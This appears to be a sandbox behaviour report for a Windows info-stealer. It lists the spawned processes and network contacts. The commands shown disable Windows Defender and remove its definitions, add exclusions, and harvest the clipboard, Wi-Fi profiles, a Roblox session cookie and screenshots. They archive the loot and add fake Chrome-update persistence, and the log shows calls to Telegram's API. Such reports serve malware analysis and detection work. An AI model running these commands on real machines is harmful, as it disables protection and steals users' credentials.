C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('join discord.gg/input for support', 0, 'INPUT v2', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏   .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏   .scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\ProgramData\main.exe

"C:\ProgramData\main.exe"

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('join discord.gg/input for support', 0, 'INPUT v2', 48+16);close()"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\ProgramData\setup.exe

"C:\ProgramData\setup.exe"

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u3katkwy\u3katkwy.cmdline"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB80.tmp" "c:\Users\Admin\AppData\Local\Temp\u3katkwy\CSC6AC69D7B17754E838FECA98EB612E886.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\1M7c4.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI39802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI39802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\1M7c4.zip" *

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD6F7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD6F7.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 1680"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 412 -p 3304 -ip 3304

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3304 -s 2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.179.227:443 gstatic.com tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
GB 142.250.187.228:80 www.google.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 23.180.102.163:80 tcp
US 209.149.75.78:80 tcp
US 140.226.28.163:80 tcp
US 21.127.195.67:80 tcp
HK 103.44.162.117:80 tcp
NO 88.88.253.68:80 tcp
US 214.219.222.5:80 tcp
CR 201.193.123.198:80 tcp
US 8.8.8.8:53 api.telegram.org udp
FJ 144.120.170.173:80 tcp
CN 42.90.78.3:80 tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 30.104.185.65:80 tcp
US 44.92.150.77:80 tcp
JP 60.159.173.159:80 tcp
US 74.26.132.234:80 tcp
US 174.25.158.107:80 tcp
SG 43.57.219.36:80 tcp
FR 139.54.60.175:80 tcp
US 52.23.141.162:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 144.251.188.55:80 tcp
US 29.190.59.165:80 tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 108.37.161.79:80 tcp
CN 123.172.6.125:80 tcp
US 108.147.187.16:80 tcp
US 209.8.172.81:80 tcp
ES 87.216.225.100:80 tcp
US 8.232.105.187:80 tcp
US 19.44.87.0:80 tcp
US 13.255.235.149:80 tcp
SG 43.98.188.30:80 tcp
US 4.135.232.80:80 tcp
US 208.95.112.1:80 ip-api.com tcp
US 11.53.37.228:80 tcp
US 45.83.133.155:80 tcp
EG 156.203.77.234:80 tcp
US 171.151.201.16:80 tcp
JP 219.62.175.200:80 tcp
JP 150.18.19.250:80 tcp
US 98.215.166.55:80 tcp
CN 182.242.189.169:80 tcp
HK 156.224.84.36:80 tcp
US 48.169.236.253:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
AU 147.41.128.220:80 tcp
US 4.140.107.194:80 tcp
US 159.123.31.223:80 tcp
US 134.24.122.231:80 tcp
CN 210.15.84.238:80 tcp
CN 8.132.195.141:80 tcp
JP 157.6.73.141:80 tcp
DE 37.89.191.4:80 tcp
US 34.114.233.30:80 tcp
RU 212.83.2.123:80 tcp
AT 157.247.50.60:80 tcp
AU 103.0.45.160:80 tcp
CA 166.48.70.47:80 tcp
KR 14.94.12.52:80 tcp
KR 42.27.141.187:80 tcp
US 32.132.105.225:80 tcp
CN 112.36.125.231:80 tcp
US 23.167.165.243:80 tcp
US 170.23.52.145:80 tcp
CN 139.227.62.207:80 tcp
US 140.31.236.114:80 tcp
FI 212.94.73.244:80 tcp
KR 49.27.236.18:80 tcp
US 19.146.135.187:80 tcp
BG 95.111.122.65:80 tcp
US 135.248.97.254:80 tcp
US 55.94.73.151:80 tcp
CN 117.167.29.0:80 tcp
JP 210.224.171.47:80 tcp
US 1.186.174.26:80 tcp
US 75.38.121.194:80 tcp
